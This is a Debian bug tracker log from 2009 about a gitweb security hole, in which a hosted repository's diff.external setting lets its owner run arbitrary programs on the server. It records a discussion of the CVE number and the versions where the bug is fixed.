Debian Bug report logs - #512330
gitweb: do not run "git diff" that is Porcelain

version graph

Package: gitweb; Maintainer for gitweb is Gerrit Pape <pape@smarden.org>; Source for gitweb is src:git.

Reported by: Frédéric Brière <fbriere@fbriere.net>

Date: Mon, 19 Jan 2009 19:00:01 UTC

Severity: grave

Tags: security

Found in version git-core/1:1.5.4-1

Fixed in versions 1:1.6.0.6-1, git-core/1:1.5.6.5-2, 1:1.4.4.4-4+etch1

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:00:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Frédéric Brière <fbriere@fbriere.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:00:03 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Frédéric Brière <fbriere@fbriere.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 13:56:44 -0500
Package: gitweb
Version: 1.5.4
Severity: grave
Tags: security
Justification: user security hole

This bug report covers CVE-2008-5517.

Now, correct me if I'm wrong, Gerrit, but this doesn't have anything to
do with shell metacharacters, despite what the CVE claims.

This actually relates to the ability to run an external diff command
(diff.external).  If Alice maintains a repo being hosted by Bob, she
could therefore trick gitweb into invoking any executable she chooses.
This is bad if gitweb is being run as a priviledged user, or if Alice is
not meant to have executing rights on the server.

This has been fixed in 1:1.6.0.6-1, already in experimental.  It has
also been fixed upstream in 1.5.6.6, although the patch[*] could be
cleanly applied to lenny's 1.5.6.5 as well.

[*] <http://repo.or.cz/w/git.git?a=commitdiff;h=dfff4b7aa42de7e7d58caeebe2c6128449f09b76;hp=872354dcb3ce5f34f7ddb12d2c89d26a1ea4daf0>

Support for diff.external was added in 1.5.4, so this bug does not apply
to sarge.


-- System Information:
Debian Release: 5.0
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26 (SMP w/1 CPU core)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




Bug no longer marked as found in version 1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:12:03 GMT) Full text and rfc822 format available.

Bug marked as found in version 1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:12:04 GMT) Full text and rfc822 format available.

Bug marked as fixed in version 1:1.6.0.6-1. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:18:04 GMT) Full text and rfc822 format available.

Bug no longer marked as found in version 1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:24:14 GMT) Full text and rfc822 format available.

Bug marked as found in version git-core/1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:24:15 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:33:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:33:05 GMT) Full text and rfc822 format available.

Message #20 received at 512330@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Frédéric Brière <fbriere@fbriere.net>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 20:30:20 +0100
* Frédéric Brière:

> This bug report covers CVE-2008-5517.
>
> Now, correct me if I'm wrong, Gerrit, but this doesn't have anything to
> do with shell metacharacters, despite what the CVE claims.
>
> This actually relates to the ability to run an external diff command
> (diff.external).

Nope, this is a different bug.  The diff.external issue hasn't
received a CVE yet, AFAIK.




Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:42:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Frédéric Brière <fbriere@fbriere.net>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:42:07 GMT) Full text and rfc822 format available.

Message #25 received at 512330@bugs.debian.org (full text, mbox):

From: Frédéric Brière <fbriere@fbriere.net>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 14:40:33 -0500
On Mon, Jan 19, 2009 at 08:30:20PM +0100, Florian Weimer wrote:
> > This bug report covers CVE-2008-5517.
> 
> Nope, this is a different bug.  The diff.external issue hasn't
> received a CVE yet, AFAIK.

Strange, the first two links of the mitre.org page seem to imply
otherwise.

Could you tell me where to find more information about this bug, then?
All my searches have turned up is the diff.external issue, and there
doesn't seem to be any bug report attached to this CVE.


-- 
<StevenK> I can usually supress the feelings that tell me to crash
          tackle a girl into the bushes




Bug no longer marked as found in version git-core/1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:51:02 GMT) Full text and rfc822 format available.

Bug marked as found in version 1:1.5.4-1. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:51:02 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 20:15:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 20:15:06 GMT) Full text and rfc822 format available.

Message #34 received at 512330@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: Frédéric Brière <fbriere@fbriere.net>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 21:14:45 +0100
* Frédéric Brière:

> On Mon, Jan 19, 2009 at 08:30:20PM +0100, Florian Weimer wrote:
>> > This bug report covers CVE-2008-5517.
>> 
>> Nope, this is a different bug.  The diff.external issue hasn't
>> received a CVE yet, AFAIK.
>
> Strange, the first two links of the mitre.org page seem to imply
> otherwise.

Yes, and Novell's SRPM matches the bug distribution.  I would say,
let's use CVE-2008-5517 for this issue.

> Could you tell me where to find more information about this bug, then?

There's another set of bugs, which has received CVE-2008-5516 and was
silently fixed by upstream quite some time ago.




Bug marked as fixed in version 1:1.5.6.5-2, send any further explanations to Frédéric Brière <fbriere@fbriere.net> Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Tue, 20 Jan 2009 06:48:02 GMT) Full text and rfc822 format available.

Bug marked as fixed in version 1:1.4.4.4-4+etch1, send any further explanations to Frédéric Brière <fbriere@fbriere.net> Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Tue, 20 Jan 2009 06:48:03 GMT) Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 17 Feb 2009 07:36:13 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 08:07:06 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.